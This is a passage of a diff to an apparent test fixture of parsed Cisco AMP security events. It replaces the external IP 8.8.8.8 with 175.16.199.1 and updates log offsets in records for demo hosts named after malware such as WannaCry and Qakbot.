 "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"
 ],
@@ -467,7 +467,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -479,7 +479,7 @@
 "@timestamp": "2021-01-14T12:57:45.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -519,7 +519,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 9881,
+ "log.offset": 9921,
 "related.hash": [
 "75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12",
 "a97fb86da4e010974860e5024137b56b",
@@ -530,7 +530,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -546,7 +546,7 @@
 "@timestamp": "2021-01-14T12:32:14.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -584,7 +584,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 11257,
+ "log.offset": 11302,
 "related.hash": [
 "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"
 ],
@@ -593,7 +593,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -605,7 +605,7 @@
 "@timestamp": "2021-01-14T12:32:14.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -643,7 +643,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 12514,
+ "log.offset": 12564,
 "related.hash": [
 "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"
 ],
@@ -652,7 +652,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -666,7 +666,7 @@
 "cisco.amp.cloud_ioc.short_description": "W32.Qakbot.ioc",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -701,7 +701,7 @@
 "host.hostname": "Demo_Qakbot_1",
 "host.name": "Demo_Qakbot_1",
 "input.type": "log",
- "log.offset": 13751,
+ "log.offset": 13806,
 "process.hash.sha256": "8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75",
 "related.hash": [
 "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"
@@ -711,7 +711,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -723,7 +723,7 @@
 "@timestamp": "2021-01-14T12:27:23.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -756,7 +756,7 @@
 "host.hostname": "Demo_Low_Prev_Retro",
 "host.name": "Demo_Low_Prev_Retro",
 "input.type": "log",
- "log.offset": 15508,
+ "log.offset": 15568,
 "related.hash": [
 "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"
 ],
@@ -765,7 +765,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -777,7 +777,7 @@
 "@timestamp": "2021-01-14T12:19:10.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -803,13 +803,13 @@
 "host.hostname": "Demo_AMP_MAP_FriedEx",
 "host.name": "Demo_AMP_MAP_FriedEx",
 "input.type": "log",
- "log.offset": 16640,
+ "log.offset": 16705,
 "related.hosts": [
 "Demo_AMP_MAP_FriedEx"
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -821,7 +821,7 @@
 "@timestamp": "2021-01-14T12:11:04.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -859,7 +859,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 17570,
+ "log.offset": 17640,
 "related.hash": [
 "48a0bf05b9706a00d2a0ff6260412f11",
 "5058b16a86beee96927371210b9a9f682976a50a",
@@ -870,7 +870,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -882,7 +882,7 @@
 "@timestamp": "2021-01-14T12:02:58.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -923,7 +923,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 18818,
+ "log.offset": 18893,
 "process.hash.md5": "045451fa238a75305cc26ac982472367",
 "process.hash.sha1": "2131cff0959d213cd9a5e8a8ac362d265d5b1316",
 "process.hash.sha256": "9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97",
@@ -939,7 +939,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -955,7 +955,7 @@
 "@timestamp": "2021-01-14T12:02:58.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -987,7 +987,7 @@
 "host.hostname": "Demo_Qakbot_2",
 "host.name": "Demo_Qakbot_2",
 "input.type": "log",
- "log.offset": 20427,
+ "log.offset": 20507,
 "related.hash": [
 "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62"
 ],
@@ -996,7 +996,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1008,7 +1008,7 @@
 "@timestamp": "2021-01-14T11:58:57.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1042,7 +1042,7 @@
 "host.hostname": "Demo_WannaCry_Ransomware",
 "host.name": "Demo_WannaCry_Ransomware",
 "input.type": "log",
- "log.offset": 21536,
+ "log.offset": 21621,
 "related.hash": [
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
@@ -1051,7 +1051,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1063,7 +1063,7 @@
 "@timestamp": "2021-01-14T11:58:57.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1102,7 +1102,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 22729,
+ "log.offset": 22819,
 "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4",
 "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26",
 "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
@@ -1116,7 +1116,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -1132,7 +1132,7 @@
 "@timestamp": "2021-01-14T11:58:54.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1173,7 +1173,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 24252,
+ "log.offset": 24347,
 "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4",
 "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26",
 "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
@@ -1189,7 +1189,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -1205,7 +1205,7 @@
 "@timestamp": "2021-01-14T11:58:54.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1237,7 +1237,7 @@
 "host.hostname": "Demo_WannaCry_Ransomware",
 "host.name": "Demo_WannaCry_Ransomware",
 "input.type": "log",
- "log.offset": 25859,
+ "log.offset": 25959,
 "related.hash": [
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
@@ -1246,7 +1246,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1258,7 +1258,7 @@
 "@timestamp": "2021-01-14T11:49:08.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1284,13 +1284,13 @@
 "host.hostname": "Demo_AMP_MAP_FriedEx",
 "host.name": "Demo_AMP_MAP_FriedEx",
 "input.type": "log",
- "log.offset": 26979,
+ "log.offset": 27084,
 "related.hosts": [
 "Demo_AMP_MAP_FriedEx"
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1302,7 +1302,7 @@
 "@timestamp": "2021-01-14T11:41:12.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1336,7 +1336,7 @@
 "host.hostname": "Demo_WannaCry_Ransomware",
 "host.name": "Demo_WannaCry_Ransomware",
 "input.type": "log",
- "log.offset": 27909,
+ "log.offset": 28019,
 "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
 "related.hash": [
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
@@ -1346,7 +1346,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1358,7 +1358,7 @@
 "@timestamp": "2021-01-14T11:41:12.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1392,7 +1392,7 @@
 "host.hostname": "Demo_WannaCry_Ransomware",
 "host.name": "Demo_WannaCry_Ransomware",
 "input.type": "log",
- "log.offset": 29220,
+ "log.offset": 29335,
 "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
 "related.hash": [
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
@@ -1402,7 +1402,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1414,7 +1414,7 @@
 "@timestamp": "2021-01-14T11:28:46.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1446,7 +1446,7 @@
 "host.hostname": "Demo_AMP_Exploit_Prevention_Audit",
 "host.name": "Demo_AMP_Exploit_Prevention_Audit",
 "input.type": "log",
- "log.offset": 30538,
+ "log.offset": 30658,
 "related.hash": [
 "fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79"
 ],
@@ -1455,7 +1455,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1467,7 +1467,7 @@
 "@timestamp": "2021-01-14T11:28:45.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1507,7 +1507,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 31671,
+ "log.offset": 31796,
 "related.hash": [
 "5df0c4ebca109779dc8afc745d612637",
 "bdb11107a33eaeded6a838eb2a0e6167637dbe9c",
@@ -1518,7 +1518,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1530,7 +1530,7 @@
 "@timestamp": "2021-01-14T11:26:38.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1564,7 +1564,7 @@
 "host.hostname": "Demo_WannaCry_Ransomware",
 "host.name": "Demo_WannaCry_Ransomware",
 "input.type": "log",
- "log.offset": 32991,
+ "log.offset": 33121,
 "related.hash": [
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
@@ -1573,7 +1573,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1585,7 +1585,7 @@
 "@timestamp": "2021-01-14T11:26:38.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1623,7 +1623,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 34184,
+ "log.offset": 34319,
 "related.hash": [
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
@@ -1632,7 +1632,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -1648,7 +1648,7 @@
 "@timestamp": "2021-01-14T11:26:37.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1682,7 +1682,7 @@
 "host.hostname": "Demo_WannaCry_Ransomware",
 "host.name": "Demo_WannaCry_Ransomware",
 "input.type": "log",
- "log.offset": 35457,
+ "log.offset": 35597,
 "related.hash": [
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
@@ -1691,7 +1691,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1703,7 +1703,7 @@
 "@timestamp": "2021-01-14T11:26:37.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1737,7 +1737,7 @@
 "host.hostname": "Demo_WannaCry_Ransomware",
 "host.name": "Demo_WannaCry_Ransomware",
 "input.type": "log",
- "log.offset": 36650,
+ "log.offset": 36795,
 "related.hash": [
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
@@ -1746,7 +1746,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1758,7 +1758,7 @@
 "@timestamp": "2021-01-14T11:26:37.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1792,7 +1792,7 @@
 "host.hostname": "Demo_WannaCry_Ransomware",
 "host.name": "Demo_WannaCry_Ransomware",
 "input.type": "log",
- "log.offset": 37836,
+ "log.offset": 37986,
 "related.hash": [
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
@@ -1801,7 +1801,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1813,7 +1813,7 @@
 "@timestamp": "2021-01-14T11:26:37.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1851,7 +1851,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 39029,
+ "log.offset": 39184,
 "related.hash": [
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
@@ -1860,7 +1860,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -1876,7 +1876,7 @@
 "@timestamp": "2021-01-14T11:26:37.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1908,7 +1908,7 @@
 "host.hostname": "Demo_WannaCry_Ransomware",
 "host.name": "Demo_WannaCry_Ransomware",
 "input.type": "log",
- "log.offset": 40302,
+ "log.offset": 40462,
 "related.hash": [
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
@@ -1917,7 +1917,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1929,7 +1929,7 @@
 "@timestamp": "2021-01-14T11:26:37.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -1961,7 +1961,7 @@
 "host.hostname": "Demo_WannaCry_Ransomware",
 "host.name": "Demo_WannaCry_Ransomware",
 "input.type": "log",
- "log.offset": 41422,
+ "log.offset": 41587,
 "related.hash": [
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
@@ -1970,7 +1970,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -1982,7 +1982,7 @@
 "@timestamp": "2021-01-14T11:26:36.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -2020,7 +2020,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 42542,
+ "log.offset": 42712,
 "related.hash": [
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
@@ -2029,7 +2029,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -2045,7 +2045,7 @@
 "@timestamp": "2021-01-14T11:26:36.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -2085,7 +2085,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 43815,
+ "log.offset": 43990,
 "related.hash": [
 "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
 "84c82835a5d21bbcf75a61706d8ab549",
@@ -2096,7 +2096,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -2112,7 +2112,7 @@
 "@timestamp": "2021-01-14T11:26:36.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -2144,7 +2144,7 @@
 "host.hostname": "Demo_WannaCry_Ransomware",
 "host.name": "Demo_WannaCry_Ransomware",
 "input.type": "log",
- "log.offset": 45179,
+ "log.offset": 45359,
 "related.hash": [
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
@@ -2153,7 +2153,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -2165,7 +2165,7 @@
 "@timestamp": "2021-01-14T11:26:35.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -2205,7 +2205,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 46299,
+ "log.offset": 46484,
 "related.hash": [
 "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
 "84c82835a5d21bbcf75a61706d8ab549",
@@ -2216,7 +2216,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -2232,7 +2232,7 @@
 "@timestamp": "2021-01-14T11:26:35.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -2272,7 +2272,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 47663,
+ "log.offset": 47853,
 "related.hash": [
 "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
 "84c82835a5d21bbcf75a61706d8ab549",
@@ -2283,7 +2283,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -2299,7 +2299,7 @@
 "@timestamp": "2021-01-14T11:26:35.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -2339,7 +2339,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 49034,
+ "log.offset": 49229,
 "related.hash": [
 "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
 "84c82835a5d21bbcf75a61706d8ab549",
@@ -2350,7 +2350,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -2366,7 +2366,7 @@
 "@timestamp": "2021-01-14T11:26:35.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -2407,7 +2407,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 50398,
+ "log.offset": 50598,
 "process.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4",
 "process.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26",
 "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
@@ -2423,7 +2423,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -2439,7 +2439,7 @@
 "@timestamp": "2021-01-14T10:59:33.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -2478,7 +2478,7 @@
 "host.hostname": "Demo_AMP_MAP_FriedEx",
 "host.name": "Demo_AMP_MAP_FriedEx",
 "input.type": "log",
- "log.offset": 52012,
+ "log.offset": 52217,
 "process.hash.md5": "71c85477df9347fe8e7bc55768473fca",
 "process.hash.sha1": "ff658a36899e43fec3966d608b4aa4472de7a378",
 "process.hash.sha256": "a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536",
@@ -2494,7 +2494,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -2512,7 +2512,7 @@
